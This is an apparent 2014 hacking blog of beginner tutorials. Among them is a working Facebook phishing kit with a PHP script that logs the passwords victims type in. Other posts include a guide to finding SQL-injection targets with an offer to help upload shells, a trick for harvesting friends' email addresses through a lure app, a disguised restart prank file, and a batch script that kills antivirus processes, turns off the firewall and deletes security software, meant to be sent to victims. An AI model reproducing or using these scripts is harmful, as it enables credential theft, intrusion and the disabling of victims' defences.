Wednesday, 30 April 2014

About Us



For Demand Contact Us :
Facebook ID : www.facebook.com/pappu.bacha22
                        www.facebook.com/kiyani.46
Email : hammad.kiyani@yahoo.com
           innocentguy813@yahoo.com
Google+ ID : hkiyani21
Twitter ID : hammad.kiyani

Create FB Virus

how to create a facebook virus


as we all know creating virus is illegal but creating funny virus is not.
Here I will show you how to make a funny virus to panic your friends. In this tutorial I will show you how to make Facebook virus using simple commands on notepad. .This will make the victim think they have got a virus when they click on an icon such as Internet Explorer.

so, follows the steps:-
1) Open notepad 
2) Type this in : @echo off msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX! PAUSE shutdown -r -t 300 -c ―SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED!!! PLEASE WAIT ..........."
 3)Save as facebook password breaker .bat
4) Here the Virus is created and ready to use 
5) Send it to your friends and say them it can break Facebook accounts
 When He/She double click it a message will open and their computer will restart. After five minutes windows will restart, that is all. This is totally harmless and will give you a laugh.

NOTE: - The hack can be changed and use to make orkut virus or hi5.

Remove GPhone Virus

How To Remove Gphone Virus 


Well gphone.exe is one of the most dangerous virus spreading very rapidly. It is a Trojan and changes your IE homepage and sends tries to open gtalk and yahoo messenger. It even sends messages to gtalk contacts. Its icon is just like that of folder icon and people thinking of folder click on it get infected by the virus. Gphone virus basically is a 260 kb .exe file which looks like a folder and it can take any name of any other folder if you have clicked on the virus folder which looks like a folder but it is not. If you have a folder name ―movies‖ in your D drive it will make a exe file in the folder named movies.exe and if you click on that exe file it too work as a virus. It makes .exe files in all the folders you have with the name of the folder.
How to remove this virus Method 
method1-
1. Go to Task Manager then Processes and then click on gphone.exe and click on end process.
2. Manually go to folder where gphone.exe is present and delete it.

method 2-
Use the Glary Utilities freeware to remove the exe files.
1. Install the Glary Utilities.
Open it 2. Go to the modules tab -> Files and Folders-> Duplicate files finder. 3. Search for .exe files of same size and delete all the files with size 260 kb

How to find vulnerable websites (For beginners)

How to find vulnerable websites (For beginners)

for this you must know 1st what is sql poizen

I thought i'd post this because using a tool like this is much quicker than doing manual SQLI (unless you prefer doing it old school.:tongue This tool is a little like havij but in my opinion better. I will only be showing you howto find vulnerable websites with this tutorial as their's plenty of tutorials on how to deface an sql vulnerable site.

First off you need to download the actual tool itself (No this is not my own tool)

Download (Survey free); http://www.mediafire.com/?dtnolcj562ca6ss


Once you've downloaded the program itself from the above download link, you need to extract it to a place you will know where to find it. You can find a picture of the programe itself, once opened,

NOTE- Make sure you don't extract the tool away from the folder because that's where the dorks are.


Ok so now for the tutorial, this is a little long but who ever said hacking was easy? just simply follow these steps bellow and then you will be successful in "hacking" your opponent.


Step 1 -First you will need to click the "Scanner" tab and then the little "+" icon on the "All dorks". Once done you will see a list like below.

this is called a "dork" you can pick any dork you want via clicking the little "+" icon, again.


Step 2 - Next you will need to pick a specific "dork" I'm going to be using ASP with dork ; ".asp?bookID=" you can (enter it into the search box the type of dork you're looking for. This tutorial doesn't require this specific dork, you can chose one to your own preference. So now our stage process should be as shown below.

Step 3 - Now you will need to press the scan button, make sure to press "Remove duplicates". See the below picture.



Step 4 - Once you've completed "Step 3" the next thing you will need to do is right click your list (the white part) and press "Send to SQLI Crawler" as so. 


Step 5 - Once in the SQLI Crawler you will need to press "Crawl" this will find you the vulnerable links from the ones you just just imported, this didn't work for me as good as I was hoping. It should look like the following.


step6 - Once your list is populated you have now got yourself some vulnerable sites to SQL inject.

 
I would of continued the tutorial into more depth of executing SQL injection with this tool but there's already tutorials around that you can use. If you need any help with SQL injecting/uploading a shell just PM me, I'll be more than happy to help. I know you might think this tutorial is well pointless but it's a simple way of finding vulnerable websites whilst using some of the best dorks. Oh and before you guys say isn't it better just using "Google" well in my opinion no, this method tells you if its vulnerable and gives you over +50 sites at a time which will keep you busy.


I hope you liked this tutorial and remember whenever hacking/exploiting sites always use a proxy to hide yourself, here's a few proxy's that I use.
http://www.hidemyass.com
http://www.newipnow.com
http://www.xitenow.com/ (best in my opinion)



Remember all my tutorials I do myself from my own personal knowledge. 

Virus scan.
https://www.virustotal.com/file/0747...is/1346972893/

TOR Browser

TOR BROWSER
tor official logo
frnds TOR BROWSER is vry useful nd one of my favourate softwares. In my opinion everyone need this softwares specially college students,workers work on offices


TOR browser is available o windows, linux, mac


tor function:-
Tor helps people by opening blockwebsites like it helps office employs to open websites other than their work with privacy
Tor also helps college students by unbloking bloked websites like facebook, and many mores

In tor's official website it is written that :-
The Tor software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets you access sites which are blocked.

running tor browser is very easy first download tor browser from tor's official website given below http://www.torproject.org.in/download/download-easy.html.en

afterword you will know how to run it
for any problems comment below

Security Kiss (Proxy Software)

2.Security KISS (from my side use this)]


Its available on all platforms like mac windows linux android,ios

SecurityKISS  is the program and the service that allows you access to the Internet despite censorship and local restrictions. It also makes your connection secure and prevents others from viewing your web browsing activities, instant messages, downloads, credit card information or anything else you send over the network.
Technically SecurityKISS is a Virtual Private Network (VPN) implementation. It creates a VPN between your computer and our security gateway so that all your internet traffic travels through an impenetrable, non-transparent tunnel.
for download click here

Proxifier (Proxy Software)

1. Proxifier

Proxifier allows network applications that do not support working through proxy servers to operate through a SOCKS or HTTPS proxy and chains
Work with any Internet client through a proxy.
  • Improve network performance or ensure privacy.
  • Flexible rule system.
  • Easy yet powerful UI with live data.
  • Up to date with new technologies.
  • Its available in mac nd windows
for download click here

Make your own antivirus

Make your own antivirus
ya thats right you can make your own antivirus withjust typing fer words on notepad

as for making a antivirus legal documents should be needed nd a legeal permission.But this is small document so don't its only for education purpose


for this just type the following word in notepad.....
@echo off
title Antivirus
echo Antivirus
echo created by your name
:start
if exist virus.bat goto infected
if not exist virus.bat goto clean
cd C:\Windows\system32
:infected
echo warning virus detected
del virus.bat
pause
goto start
:clean
echo System secure!
pause
exit 
save this file as antivirus.bat(you should chnge name but .bat is neccesary)
when you double click on the file it will start scanning your computer

FB Phishing

facebook account can be hacked using phishing page

As my frnds ask me to how to hack a account using phishing, so I thought to put it on the. so lets start learn with 

What is phishing?


Phishing is attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to get his username and password
sound Interesting naa...Ya I know its intresting.

follows the following steps:-

1..Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.

2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad
3.Now open the notepad and press CTRL+F,and type ACTION.


4.You will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5.delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is ready.it will look like a pic given below

8.Open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9. You have two files now one is index.htm and another is post.php,remember file extension is important.
10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.my3gb.com.

11.I prefer u to use 000webhost because it will be easy to use



12.You have to make a account in that ,after that it looks like a picture given below.

13.Now go control pannel,then on file manager

14. After that a new window will pop up.Now go to public_html.


15.Delete the file named default.php,after that upload two files index.htm and post.php  one by one
                             

16.Now the last step click on view of index.htm it will look same as facebook page


17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.


                           

19.Click on view now u will have your victim password and email id



20. this is a simple trick to hack any Facebook password account by phishing page.

note:

phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many mores.....

Enjoy now........

Explore your friends email

Expose your friend's email address of Facebook

hack any email id
We know that for hacking anyone Facebook password first we have to know about his/her facebook email id .Sometimes our victim hide the email id ,then it becomes quiet difficult to hack his password.
Now in this paper i will show you how to expose anyone email id of Facebook so that we have at least something about him to hack his Facebook password.This method is quiet easy and can not harm anyone as we just expose his email id not anything else.



Steps to do that....

1.First you have change your facebook browsing from https to http.

2. for that Go to account setting ->Security->then see the first option click on that and disable it.As shown in pic.



3.Now you have to join the application to expose your friend email id ,link is given below.


4.After you join a given application you will see a page given below.

how to hack email id

5.Now you need a id of your friend just type graph.facebook.com/username of victim.

6.Username you will easily get on looking to his profile.

email id hacked

7.Now you have type graph.facebook.com/username,like mine is graph.facebook.com/navprabhatsingh.

8.When you enter the id in the application you have joined before  it will show you the error as shown in pic.



9.It means your victim must have join the second app that is love percentage application.It is because when victim join the app the app will steal his email id.

10.Now send this link to your victim and when your victim join the u will be able to see his email id.

11.It's a simple love app so no need to worry, your victim definitely join this app.
12.When your victim join the application,Now enter the id or repeat the step 8.


13.It will give you the email id as well as id of  all of his friends.

hack id via facebook

14.know it is quiet complicated but easy to do

Now enjoy....

Best Cracking Tools

Some of the best Password cracking tools


In this post i am going to write about various password cracking tools. These password cracking tools includes, network password cracking, windows password cracking, ftp, http, telnet, IMAP, rlogin, SSH and various other protocol password cracking tools.


These are some popular password cracking tools:


Cain and Abel: This is a free password cracking tool for windows systems. It allows users to recover various kind of passwords. This password cracking tool recover passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and crypt-analysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.


John the Ripper: John the Ripper is a fast password crcking tool available for UNIX/Linux and Mac OS X platforms. This is not a free tool but there is a free trail version available to download.


Ophcrack: Ophcrack is a best windows password crcking tool. It is a rainbow-table based windows password cracker.  Features of this cracking tool includes LM and NTLM hash cracking, a GUI, the ability to load hashes from encrypted SAM recovered from a Windows partition, and a Live CD version.


THC Hydra: THC Hydra is a a remote password cracking tool. It supports various network protocols including telnet, ftp, http, https, smb, several databases, and much more.


Brutus: This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NNTP, and more.


Medusa: Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few.


Aircrack: Aircrack is a famous wireless network password cracking tool. This is a suite of tools for 802.11a/b/g WEP and WPA cracking. It implements the best known cracking algorithms to recover wireless keys once enough encrypted packets have been gathered. . The suite comprises over a dozen discrete tools, including airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

Disable Victums Antivirus

How To Disable Victim Antivirus

                  how to disable your victim antivirus

IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .


Open Notepad Copy it and Paste To Notepad

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

save it in .bat extension and send it to the victim




IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .